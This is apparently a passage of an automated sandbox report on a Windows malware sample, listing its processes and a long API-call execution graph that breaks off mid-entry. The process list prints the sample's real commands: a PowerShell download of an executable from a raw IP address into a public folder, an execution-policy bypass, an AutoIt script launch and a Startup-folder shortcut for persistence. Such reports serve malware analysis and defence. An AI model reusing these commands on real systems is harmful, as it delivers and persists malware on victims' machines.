                                                                    MD5 hash:A9E7A83DD50B78BAD39A2A57CBEBB137
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:03:19:12
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe""
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:03:19:12
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:03:19:19
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:03:19:19
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:03:19:24
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\Public\Guard.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                    Imagebase:0xf0000
                                                                    File size:893'608 bytes
                                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 8%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:13
                                                                    Start time:03:19:27
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                    Imagebase:0x1c0000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:03:19:27
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:03:19:38
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                    Imagebase:0x7ff664500000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:03:19:40
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                    Imagebase:0xbe0000
                                                                    File size:893'608 bytes
                                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 8%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:19
                                                                    Start time:03:19:51
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff7403e0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:11%
                                                                      Total number of Nodes:1436
                                                                      Total number of Limit Nodes:41
                                                                      execution_graph 98366 7ff643932bf8 98369 7ff64392ed44 98366->98369 98368 7ff643932c05 98370 7ff64392edcd 98369->98370 98371 7ff64392ed75 98369->98371 98376 7ff64392edfe 98370->98376 98400 7ff6439a34e4 77 API calls 3 library calls 98370->98400 98371->98370 98378 7ff643933c20 98371->98378 98374 7ff64397a636 98375 7ff64392eda8 98375->98376 98399 7ff64392ee20 5 API calls Concurrency::wait 98375->98399 98376->98368 98397 7ff643933c80 98378->98397 98379 7ff643944f0c 34 API calls __scrt_initialize_thread_safe_statics 98379->98397 98380 7ff6439805be 98381 7ff6439805d1 98380->98381 98407 7ff6439a34e4 77 API calls 3 library calls 98380->98407 98381->98375 98384 7ff643934ac0 98384->98375 98385 7ff643934fe7 98389 7ff64392e0a8 4 API calls 98385->98389 98386 7ff643933dde 98386->98375 98387 7ff64392e0a8 4 API calls 98387->98386 98388 7ff64397fefe 98392 7ff64392e0a8 4 API calls 98388->98392 98389->98386 98391 7ff643934a8f 98391->98384 98391->98388 98393 7ff643934aa9 98391->98393 98392->98384 98393->98384 98393->98387 98395 7ff643929640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98395->98397 98396 7ff643945114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98396->98397 98397->98379 98397->98380 98397->98385 98397->98386 98397->98391 98397->98393 98397->98395 98397->98396 98398 7ff6439450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 98397->98398 98401 7ff643935360 300 API calls Concurrency::wait 98397->98401 98402 7ff64392e0a8 98397->98402 98406 7ff6439a34e4 77 API calls 3 library calls 98397->98406 98398->98397 98399->98370 98400->98374 98401->98397 98403 7ff64392e0b6 98402->98403 98404 7ff64392e0bb 98402->98404 98408 7ff64392f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 98403->98408 98404->98397 98406->98397 98407->98381 98408->98404 98409 7ff643945328 98432 7ff643944cac 98409->98432 98412 7ff643945474 98464 7ff6439457e4 7 API calls 2 library calls 98412->98464 98413 7ff643945344 98415 7ff64394547e 98413->98415 98417 7ff643945362 98413->98417 98465 7ff6439457e4 7 API calls 2 library calls 98415->98465 98418 7ff6439453a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 98417->98418 98419 7ff643945387 98417->98419 98440 7ff64395ada4 98417->98440 98422 7ff64394540d 98418->98422 98461 7ff643949204 35 API calls pair 98418->98461 98421 7ff643945489 abort 98447 7ff643945930 98422->98447 98424 7ff643945412 98450 7ff643923730 98424->98450 98429 7ff643945435 98429->98421 98463 7ff643944e90 8 API calls 2 library calls 98429->98463 98431 7ff64394544c 98431->98419 98433 7ff643944cce __scrt_initialize_crt 98432->98433 98466 7ff6439465ec 98433->98466 98436 7ff643944cd7 98436->98412 98436->98413 98441 7ff64395adff 98440->98441 98442 7ff64395ade0 98440->98442 98441->98418 98442->98441 98515 7ff643921048 98442->98515 98520 7ff643921064 98442->98520 98525 7ff6439210e8 98442->98525 98530 7ff643921080 98442->98530 98780 7ff643946240 98447->98780 98451 7ff643923743 IsThemeActive 98450->98451 98452 7ff6439237a3 98450->98452 98782 7ff6439492d0 98451->98782 98462 7ff643945974 GetModuleHandleW 98452->98462 98458 7ff64392377d 98794 7ff6439237b0 98458->98794 98460 7ff643923785 SystemParametersInfoW 98460->98452 98461->98422 98462->98429 98463->98431 98464->98415 98465->98421 98467 7ff6439465f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 98466->98467 98479 7ff643947290 98467->98479 98470 7ff643944cd3 98470->98436 98474 7ff64395ac84 98470->98474 98472 7ff64394660c 98472->98470 98486 7ff6439472d8 DeleteCriticalSection 98472->98486 98475 7ff643964340 98474->98475 98476 7ff643944ce0 98475->98476 98503 7ff64395dd2c 98475->98503 98476->98436 98478 7ff643946620 8 API calls 3 library calls 98476->98478 98478->98436 98480 7ff643947298 98479->98480 98482 7ff6439472c9 98480->98482 98484 7ff6439465ff 98480->98484 98487 7ff643947614 98480->98487 98492 7ff6439472d8 DeleteCriticalSection 98482->98492 98484->98470 98485 7ff643947218 8 API calls 3 library calls 98484->98485 98485->98472 98486->98470 98493 7ff643947310 98487->98493 98490 7ff64394765f InitializeCriticalSectionAndSpinCount 98491 7ff643947654 98490->98491 98491->98480 98492->98484 98494 7ff643947371 98493->98494 98501 7ff64394736c try_get_function 98493->98501 98494->98490 98494->98491 98495 7ff643947454 98495->98494 98498 7ff643947462 GetProcAddress 98495->98498 98496 7ff6439473a0 LoadLibraryExW 98497 7ff6439473c1 GetLastError 98496->98497 98496->98501 98497->98501 98499 7ff643947473 98498->98499 98499->98494 98500 7ff643947439 FreeLibrary 98500->98501 98501->98494 98501->98495 98501->98496 98501->98500 98502 7ff6439473fb LoadLibraryExW 98501->98502 98502->98501 98514 7ff64395b9bc EnterCriticalSection 98503->98514 98505 7ff64395dd3c 98506 7ff64395e258 32 API calls 98505->98506 98507 7ff64395dd45 98506->98507 98508 7ff64395dd53 98507->98508 98510 7ff64395db44 34 API calls 98507->98510 98509 7ff64395ba10 _isindst LeaveCriticalSection 98508->98509 98511 7ff64395dd5f 98509->98511 98512 7ff64395dd4e 98510->98512 98511->98475 98513 7ff64395dc30 GetStdHandle GetFileType 98512->98513 98513->98508 98535 7ff643927718 98515->98535 98519 7ff643944f15 98519->98442 98566 7ff643927ec0 98520->98566 98522 7ff64392106d 98602 7ff643944ebc 34 API calls _onexit 98522->98602 98524 7ff643944f15 98524->98442 98671 7ff643941d80 98525->98671 98529 7ff643944f15 98529->98442 98696 7ff643927920 98530->98696 98532 7ff64392109e 98726 7ff643944ebc 34 API calls _onexit 98532->98726 98534 7ff643944f15 98534->98442 98543 7ff643929640 98535->98543 98537 7ff64392778f 98546 7ff643926f24 98537->98546 98539 7ff64392782c 98540 7ff643921051 98539->98540 98549 7ff643927410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 98539->98549 98542 7ff643944ebc 34 API calls _onexit 98540->98542 98542->98519 98550 7ff643944c68 98543->98550 98545 7ff643929663 98545->98537 98559 7ff643926f60 98546->98559 98549->98539 98553 7ff643944c2c 98550->98553 98551 7ff643944c50 98551->98545 98553->98550 98553->98551 98556 7ff64394925c EnterCriticalSection LeaveCriticalSection fread_s 98553->98556 98557 7ff643945600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 98553->98557 98558 7ff643945620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 98553->98558 98556->98553 98558->98553 98560 7ff643926f52 98559->98560 98561 7ff643926f85 98559->98561 98560->98539 98561->98560 98562 7ff643926f93 RegOpenKeyExW 98561->98562 98562->98560 98563 7ff643926faf RegQueryValueExW 98562->98563 98564 7ff643926ff5 RegCloseKey 98563->98564 98565 7ff643926fdd 98563->98565 98564->98560 98565->98564 98603 7ff6439282b4 98566->98603 98569 7ff6439282b4 4 API calls 98570 7ff643927f3a 98569->98570 98571 7ff643929640 4 API calls 98570->98571 98572 7ff643927f46 98571->98572 98610 7ff643927cf4 98572->98610 98574 7ff643927f59 98620 7ff643942d5c 6 API calls 98574->98620 98576 7ff643927fa5 98577 7ff643929640 4 API calls 98576->98577 98578 7ff643927fb1 98577->98578 98579 7ff643929640 4 API calls 98578->98579 98580 7ff643927fbd 98579->98580 98581 7ff643929640 4 API calls 98580->98581 98582 7ff643927fc9 98581->98582 98583 7ff643929640 4 API calls 98582->98583 98584 7ff64392800f 98583->98584 98585 7ff643929640 4 API calls 98584->98585 98586 7ff6439280f7 98585->98586 98621 7ff64393ef88 98586->98621 98588 7ff643928103 98628 7ff64393eec8 98588->98628 98590 7ff64392812f 98591 7ff643929640 4 API calls 98590->98591 98592 7ff64392813b 98591->98592 98639 7ff643936d40 98592->98639 98596 7ff6439281ac 98597 7ff6439281be GetStdHandle 98596->98597 98598 7ff643928220 OleInitialize 98597->98598 98599 7ff64396d350 98597->98599 98598->98522 98656 7ff64399ffc8 CreateThread 98599->98656 98601 7ff64396d367 CloseHandle 98602->98524 98604 7ff643929640 4 API calls 98603->98604 98605 7ff6439282c6 98604->98605 98606 7ff643929640 4 API calls 98605->98606 98607 7ff6439282cf 98606->98607 98608 7ff643929640 4 API calls 98607->98608 98609 7ff643927f2e 98608->98609 98609->98569 98611 7ff64396d2c8 98610->98611 98612 7ff643927d0d 98610->98612 98658 7ff64392dda4 98611->98658 98615 7ff643927d24 98612->98615 98617 7ff643927d51 98612->98617 98614 7ff64396d2d3 98657 7ff643927e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98615->98657 98617->98614 98619 7ff643944c68 4 API calls 98617->98619 98618 7ff643927d2f memcpy_s 98618->98574 98619->98618 98620->98576 98622 7ff643929640 4 API calls 98621->98622 98623 7ff64393efa3 98622->98623 98624 7ff643929640 4 API calls 98623->98624 98625 7ff64393efac 98624->98625 98626 7ff643929640 4 API calls 98625->98626 98627 7ff64393f02e 98626->98627 98627->98588 98629 7ff64393eede 98628->98629 98630 7ff643929640 4 API calls 98629->98630 98631 7ff64393eeea 98630->98631 98632 7ff643929640 4 API calls 98631->98632 98633 7ff64393eef6 98632->98633 98634 7ff643929640 4 API calls 98633->98634 98635 7ff64393ef02 98634->98635 98636 7ff643929640 4 API calls 98635->98636 98637 7ff64393ef0e 98636->98637 98638 7ff64393ef68 RegisterWindowMessageW 98637->98638 98638->98590 98640 7ff643936db9 98639->98640 98647 7ff643936d80 98639->98647 98667 7ff643945114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98640->98667 98648 7ff64392816b 98647->98648 98668 7ff643945114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98647->98668 98649 7ff6439439a8 98648->98649 98650 7ff64398a502 98649->98650 98651 7ff6439439cc 98649->98651 98669 7ff64392ee20 5 API calls Concurrency::wait 98650->98669 98651->98596 98653 7ff64398a50e 98670 7ff64392ee20 5 API calls Concurrency::wait 98653->98670 98655 7ff64398a52d 98656->98601 98657->98618 98659 7ff64392dda9 98658->98659 98661 7ff64392ddc7 memcpy_s 98658->98661 98659->98661 98662 7ff64392a7c0 98659->98662 98661->98614 98663 7ff64392a7dd memcpy_s 98662->98663 98665 7ff64392a7ed 98662->98665 98663->98661 98664 7ff64396e7da 98665->98664 98666 7ff643944c68 4 API calls 98665->98666 98666->98663 98669->98653 98670->98655 98672 7ff643929640 4 API calls 98671->98672 98673 7ff643941db2 GetVersionExW 98672->98673 98674 7ff643927cf4 4 API calls 98673->98674 98676 7ff643941dfc 98674->98676 98675 7ff64392dda4 4 API calls 98675->98676 98676->98675 98677 7ff643941e87 98676->98677 98678 7ff64392dda4 4 API calls 98677->98678 98683 7ff643941ea4 98678->98683 98679 7ff643989645 98680 7ff64398964f 98679->98680 98694 7ff6439932f4 LoadLibraryA GetProcAddress 98680->98694 98681 7ff643941f3c GetCurrentProcess IsWow64Process 98682 7ff643941f7e fread_s 98681->98682 98682->98680 98685 7ff643941f86 GetSystemInfo 98682->98685 98683->98679 98683->98681 98687 7ff6439210f1 98685->98687 98686 7ff6439896b1 98688 7ff6439896b5 98686->98688 98689 7ff6439896d7 GetSystemInfo 98686->98689 98693 7ff643944ebc 34 API calls _onexit 98687->98693 98695 7ff6439932f4 LoadLibraryA GetProcAddress 98688->98695 98690 7ff6439896bf 98689->98690 98690->98687 98692 7ff6439896f0 FreeLibrary 98690->98692 98692->98687 98693->98529 98694->98686 98695->98690 98697 7ff643927948 wcsftime 98696->98697 98698 7ff643929640 4 API calls 98697->98698 98699 7ff643927a02 98698->98699 98727 7ff643925680 98699->98727 98701 7ff643927a0c 98734 7ff643943a38 98701->98734 98705 7ff643927a2c 98750 7ff643924680 98705->98750 98707 7ff643927a3d 98708 7ff643929640 4 API calls 98707->98708 98709 7ff643927a47 98708->98709 98754 7ff64392a854 98709->98754 98712 7ff64396d05c RegQueryValueExW 98713 7ff64396d131 RegCloseKey 98712->98713 98714 7ff64396d08f 98712->98714 98717 7ff643927a83 Concurrency::wait 98713->98717 98725 7ff64396d147 wcscat Concurrency::wait 98713->98725 98715 7ff643944c68 4 API calls 98714->98715 98716 7ff64396d0b2 98715->98716 98718 7ff64396d0bf RegQueryValueExW 98716->98718 98717->98532 98719 7ff64396d0f3 98718->98719 98722 7ff64396d112 98718->98722 98720 7ff643927cf4 4 API calls 98719->98720 98720->98722 98721 7ff643929d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98721->98725 98722->98713 98724 7ff643924680 4 API calls 98724->98725 98725->98717 98725->98721 98725->98724 98758 7ff64392ec00 98725->98758 98726->98534 98763 7ff643968f90 98727->98763 98730 7ff64392ec00 4 API calls 98731 7ff6439256b4 98730->98731 98765 7ff6439256d4 98731->98765 98733 7ff6439256c1 Concurrency::wait 98733->98701 98735 7ff643968f90 wcsftime 98734->98735 98736 7ff643943a44 GetFullPathNameW 98735->98736 98737 7ff643943a74 98736->98737 98738 7ff643927cf4 4 API calls 98737->98738 98739 7ff643927a1b 98738->98739 98740 7ff6439271f8 98739->98740 98741 7ff64392721c 98740->98741 98744 7ff64396cd0c 98740->98744 98742 7ff643927274 98741->98742 98747 7ff64396cd66 memcpy_s 98741->98747 98775 7ff64392b960 98742->98775 98746 7ff643944c68 4 API calls 98744->98746 98745 7ff643927283 memcpy_s 98745->98705 98746->98747 98748 7ff643944c68 4 API calls 98747->98748 98749 7ff64396cdda memcpy_s 98748->98749 98751 7ff64392469f 98750->98751 98753 7ff6439246c8 memcpy_s 98750->98753 98752 7ff643944c68 4 API calls 98751->98752 98752->98753 98753->98707 98755 7ff64392a87a 98754->98755 98757 7ff643927a51 RegOpenKeyExW 98754->98757 98756 7ff643944c68 4 API calls 98755->98756 98756->98757 98757->98712 98757->98717 98759 7ff64392ec1d 98758->98759 98760 7ff64397a5a2 98759->98760 98761 7ff643944c68 4 API calls 98759->98761 98762 7ff64392ec55 memcpy_s 98761->98762 98762->98725 98764 7ff64392568c GetModuleFileNameW 98763->98764 98764->98730 98766 7ff643968f90 wcsftime 98765->98766 98767 7ff6439256e9 GetFullPathNameW 98766->98767 98768 7ff64396c03a 98767->98768 98769 7ff643925712 98767->98769 98770 7ff64392a854 4 API calls 98768->98770 98771 7ff643927cf4 4 API calls 98769->98771 98772 7ff64392571c 98770->98772 98771->98772 98772->98772 98773 7ff64392dda4 4 API calls 98772->98773 98774 7ff643925785 98773->98774 98774->98733 98776 7ff64392b981 98775->98776 98779 7ff64392b976 memcpy_s 98775->98779 98777 7ff64396ef2a 98776->98777 98778 7ff643944c68 4 API calls 98776->98778 98778->98779 98779->98745 98781 7ff643945947 GetStartupInfoW 98780->98781 98781->98424 98840 7ff64395b9bc EnterCriticalSection 98782->98840 98784 7ff6439492e4 98785 7ff64395ba10 _isindst LeaveCriticalSection 98784->98785 98786 7ff64392376e 98785->98786 98787 7ff643949334 98786->98787 98788 7ff64394933d 98787->98788 98792 7ff643923778 98787->98792 98841 7ff6439555d4 15 API calls _mbstowcs_s_l 98788->98841 98790 7ff643949342 98842 7ff64395b164 31 API calls _invalid_parameter_noinfo 98790->98842 98793 7ff6439236e8 SystemParametersInfoW SystemParametersInfoW 98792->98793 98793->98458 98795 7ff6439237cd wcsftime 98794->98795 98796 7ff643929640 4 API calls 98795->98796 98797 7ff6439237dd GetCurrentDirectoryW 98796->98797 98843 7ff6439257a0 98797->98843 98799 7ff643923807 IsDebuggerPresent 98800 7ff64396b872 MessageBoxA 98799->98800 98801 7ff643923815 98799->98801 98802 7ff64396b894 98800->98802 98801->98802 98803 7ff643923839 98801->98803 98953 7ff64392e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98802->98953 98917 7ff643923f04 98803->98917 98807 7ff6439238bf 98812 7ff64396b8dc SetCurrentDirectoryW 98807->98812 98813 7ff6439238c7 98807->98813 98808 7ff643923860 GetFullPathNameW 98809 7ff643927cf4 4 API calls 98808->98809 98810 7ff6439238a6 98809->98810 98933 7ff643923f9c 98810->98933 98812->98813 98814 7ff6439238d0 98813->98814 98954 7ff64398d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 98813->98954 98949 7ff643923b84 7 API calls 98814->98949 98817 7ff64396b8f8 98817->98814 98820 7ff64396b90c 98817->98820 98822 7ff643925680 6 API calls 98820->98822 98821 7ff6439238da 98824 7ff643926258 46 API calls 98821->98824 98826 7ff6439238ef 98821->98826 98823 7ff64396b916 98822->98823 98825 7ff64392ec00 4 API calls 98823->98825 98824->98826 98828 7ff64396b927 98825->98828 98827 7ff643923913 98826->98827 98831 7ff643925d88 Shell_NotifyIconW 98826->98831 98833 7ff64392391f SetCurrentDirectoryW 98827->98833 98829 7ff64396b94d 98828->98829 98830 7ff64396b930 98828->98830 98835 7ff6439271f8 4 API calls 98829->98835 98832 7ff6439271f8 4 API calls 98830->98832 98831->98827 98834 7ff64396b93c 98832->98834 98836 7ff643923934 Concurrency::wait 98833->98836 98955 7ff643927c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98834->98955 98838 7ff64396b963 GetForegroundWindow ShellExecuteW 98835->98838 98836->98460 98839 7ff64396b99f Concurrency::wait 98838->98839 98839->98827 98841->98790 98842->98792 98844 7ff643929640 4 API calls 98843->98844 98845 7ff6439257d7 98844->98845 98956 7ff643929bbc 98845->98956 98847 7ff6439257fe 98848 7ff643925680 6 API calls 98847->98848 98849 7ff643925812 98848->98849 98850 7ff64392ec00 4 API calls 98849->98850 98851 7ff643925823 98850->98851 98970 7ff643926460 98851->98970 98854 7ff64392584e Concurrency::wait 98858 7ff64392e0a8 4 API calls 98854->98858 98855 7ff64396c05e 99043 7ff6439a2948 98855->99043 98857 7ff64396c074 98859 7ff64392652c 63 API calls 98857->98859 98860 7ff64396c081 98857->98860 98861 7ff64392586a 98858->98861 98859->98860 99061 7ff64392652c 98860->99061 98863 7ff64392ec00 4 API calls 98861->98863 98864 7ff643925888 98863->98864 98868 7ff64396c099 98864->98868 98996 7ff64392eff8 98864->98996 98866 7ff6439258ad Concurrency::wait 98867 7ff64392ec00 4 API calls 98866->98867 98869 7ff6439258d7 98867->98869 98871 7ff643925ab4 4 API calls 98868->98871 98869->98868 98870 7ff64392eff8 46 API calls 98869->98870 98873 7ff6439258fc Concurrency::wait 98870->98873 98872 7ff64396c0e1 98871->98872 98874 7ff643925ab4 4 API calls 98872->98874 98876 7ff643929640 4 API calls 98873->98876 98875 7ff64396c103 98874->98875 98879 7ff643925680 6 API calls 98875->98879 98877 7ff64392591f 98876->98877 99009 7ff643925ab4 98877->99009 98881 7ff64396c12b 98879->98881 98884 7ff643925ab4 4 API calls 98881->98884 98883 7ff643925941 98883->98868 98885 7ff643925949 98883->98885 98886 7ff64396c139 98884->98886 98888 7ff643948e28 wcsftime 37 API calls 98885->98888 98887 7ff64392e0a8 4 API calls 98886->98887 98889 7ff64396c14a 98887->98889 98890 7ff643925958 98888->98890 98891 7ff643925ab4 4 API calls 98889->98891 98890->98872 98892 7ff643925960 98890->98892 98893 7ff64396c15b 98891->98893 98894 7ff643948e28 wcsftime 37 API calls 98892->98894 98897 7ff64392e0a8 4 API calls 98893->98897 98895 7ff64392596f 98894->98895 98895->98875 98896 7ff643925977 98895->98896 98898 7ff643948e28 wcsftime 37 API calls 98896->98898 98899 7ff64396c172 98897->98899 98900 7ff643925986 98898->98900 98901 7ff643925ab4 4 API calls 98899->98901 98902 7ff6439259c6 98900->98902 98905 7ff643925ab4 4 API calls 98900->98905 98904 7ff64396c183 98901->98904 98902->98893 98903 7ff6439259d3 98902->98903 99032 7ff64392df90 98903->99032 98906 7ff6439259a8 98905->98906 98907 7ff64392e0a8 4 API calls 98906->98907 98909 7ff6439259b5 98907->98909 98911 7ff643925ab4 4 API calls 98909->98911 98911->98902 98913 7ff64392d670 5 API calls 98914 7ff643925a12 98913->98914 98914->98913 98915 7ff643925ab4 4 API calls 98914->98915 98916 7ff643925a60 Concurrency::wait 98914->98916 98915->98914 98916->98799 98918 7ff643923f29 wcsftime 98917->98918 98919 7ff643923f4b 98918->98919 98921 7ff64396ba2c fread_s 98918->98921 98920 7ff6439256d4 5 API calls 98919->98920 98922 7ff643923f56 98920->98922 98923 7ff64396ba4d GetOpenFileNameW 98921->98923 99405 7ff643923eb4 98922->99405 98925 7ff643923858 98923->98925 98926 7ff64396bab0 98923->98926 98925->98807 98925->98808 98928 7ff643927cf4 4 API calls 98926->98928 98930 7ff64396babc 98928->98930 98931 7ff643923f6c 99423 7ff643926394 98931->99423 98934 7ff643923fb6 wcsftime 98933->98934 99466 7ff643929734 98934->99466 98936 7ff643923fc4 98937 7ff643924050 98936->98937 99476 7ff643924d28 77 API calls 98936->99476 98937->98807 98939 7ff643923fd3 98939->98937 99477 7ff643924b0c 79 API calls Concurrency::wait 98939->99477 98941 7ff643923fe0 98941->98937 98942 7ff643923fe8 GetFullPathNameW 98941->98942 98943 7ff643927cf4 4 API calls 98942->98943 98944 7ff643924014 98943->98944 98945 7ff643927cf4 4 API calls 98944->98945 98946 7ff643924028 98945->98946 98947 7ff64396bac2 wcscat 98946->98947 98948 7ff643927cf4 4 API calls 98946->98948 98948->98937 99481 7ff643923d90 7 API calls 98949->99481 98951 7ff6439238d5 98952 7ff643923cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98951->98952 98953->98807 98954->98817 98955->98829 98957 7ff643929be5 wcsftime 98956->98957 98958 7ff643927cf4 4 API calls 98957->98958 98959 7ff643929c1b 98957->98959 98958->98959 98969 7ff643929c4a Concurrency::wait 98959->98969 99067 7ff643929d84 98959->99067 98961 7ff643929d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98961->98969 98962 7ff643929d21 98963 7ff643929d57 Concurrency::wait 98962->98963 98964 7ff64392ec00 4 API calls 98962->98964 98963->98847 98965 7ff643929d4a 98964->98965 98967 7ff643924680 4 API calls 98965->98967 98966 7ff64392ec00 4 API calls 98966->98969 98967->98963 98968 7ff643924680 4 API calls 98968->98969 98969->98961 98969->98962 98969->98966 98969->98968 99070 7ff643926d64 98970->99070 98973 7ff64392649d 98975 7ff6439264ba FreeLibrary 98973->98975 98976 7ff6439264c0 98973->98976 98974 7ff643926d64 2 API calls 98974->98973 98975->98976 99074 7ff6439548e0 98976->99074 98979 7ff6439264db LoadLibraryExW 99093 7ff643926cc4 98979->99093 98980 7ff64396c8f6 98982 7ff64392652c 63 API calls 98980->98982 98984 7ff64396c8fe 98982->98984 98986 7ff643926cc4 3 API calls 98984->98986 98988 7ff64396c907 98986->98988 98987 7ff643926505 98987->98988 98989 7ff643926512 98987->98989 99115 7ff6439267d8 98988->99115 98991 7ff64392652c 63 API calls 98989->98991 98993 7ff643925846 98991->98993 98993->98854 98993->98855 98995 7ff64396c93f 99318 7ff643931a30 98996->99318 98998 7ff64392f029 98999 7ff64397a7a8 98998->98999 99000 7ff64392f040 98998->99000 99334 